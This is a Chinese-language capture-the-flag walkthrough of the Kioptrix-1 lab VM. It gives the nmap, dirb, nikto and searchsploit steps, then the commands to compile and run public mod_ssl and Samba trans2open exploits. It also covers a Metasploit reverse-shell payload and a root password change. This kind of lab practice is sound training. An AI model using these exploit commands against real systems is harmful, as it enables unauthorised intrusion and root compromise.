Kioptrix-1

夫君子之行，静以修身，俭以养德，非淡泊无以明志，非宁静无以致远

00 环境准备

Kali（IP：10.10.16.128）
Kioptrix 靶机
NAT 网络连接

01 主机发现

nmap -sP 10.10.16.0/24

02 端口扫描

nmap -A -v -sS -sP -p- -T4 10.10.16.152

得到开放的端口：22，80，111，139，443，1024，并得到在对应端口下使用的软件（mod_ssl/samba）。
通过端口扫描得知 apache-1.3.20，openssl-0.9.6b，mod_ssl-2.8.4(老版，谷歌搜索漏洞)
对于端口使用的插件，在下面将专门对其进行漏洞挖掘

03 目录扫描

dirb http://10.10.16.152

对 dirb 爬行的目录进行访问，没有发现可利用的价值。

04 漏洞挖掘

nikto -h 10.10.16.152

使用 nikto 进行 web 扫描发现几处可利用漏洞。

可以使用在线漏洞数据库搜索相对应的版本漏洞

https://www.exploit-db.com/search

05 漏洞利用

0x01 mod_ssl ( remote buffer overflow )

使用 Kali 自带的漏洞查找工具查找本地所有漏洞和 shellcode

searchsploit mod_ssl

ps: 如果使用 764.c 脚本的话，应为该脚本版本太老，所以还需对其内容进行修改，有点麻烦，这里直接使用 47080.c 脚本。
764.c 修改

在桌面新建一个 Kioptrix 文件夹，将 47080.c 文件拷贝过去，查看文件头得知文件的使用方法：要先安装 libssl-dev 库才能编译文件。

cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
head 47080.c
sudo apt-get install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto

编译之后运行生成的二进制文件，发现使用该二进制文件的方法。

由于该靶机使用 apache-1.3.20，所以将 target 定位到 0x6a - 0x6b

0x02 samba 2.2

① remote code excution

利用 msf 的 auxiliary/scanner/smb/smb_version 模块得知靶机使用 samba-2.2.1a

搜索 samba 2.2 的漏洞利用模块，发现最下方的 Remote Code Excution

将该模块下的脚本复制到自定义的文件夹里面，查看文件头，编译脚本。

cp /usr/share/exploitdb/exploits/multiple/remote/10.c .
head 10.c
gcc -o samba 10.c

./samba -b 0 10.10.16.152  # -b 0 是指 Linux 

② Remote Buffer Overflow

gcc -o call_trans2open 22469.c

./call_trans2open -t 10.10.16.152

③ 利用 msf

从上面 searchsploit 的结果来看，还有几个模块是关于 metasploit 的，因此可以利用 msf 来getshell 提权。

msfconsole
use exploit/linux/samba/trans2open

使用 show options 查看要添加什么参数

使用该模块下的一个 payload

set payload linux/x86/shell_reverse_tcp

set rhosts 10.10.16.152
set lhost 10.10.16.128
exploit

ps: 使用 python -v 查看当前 python 版本是 python 1.5 ，所以不能使用 python -c ‘import pty;pty.spawn("/bin/bash");’ ，可以使用 passwd 可以改变 root 密码，然后通过 ssh 登录 root 账户获取完全交互式 shell。

0x03 capture the flag

cat /var/mail/root

                                                                                                                                                                    猪头
                                                                                                                                                                 2020.3.15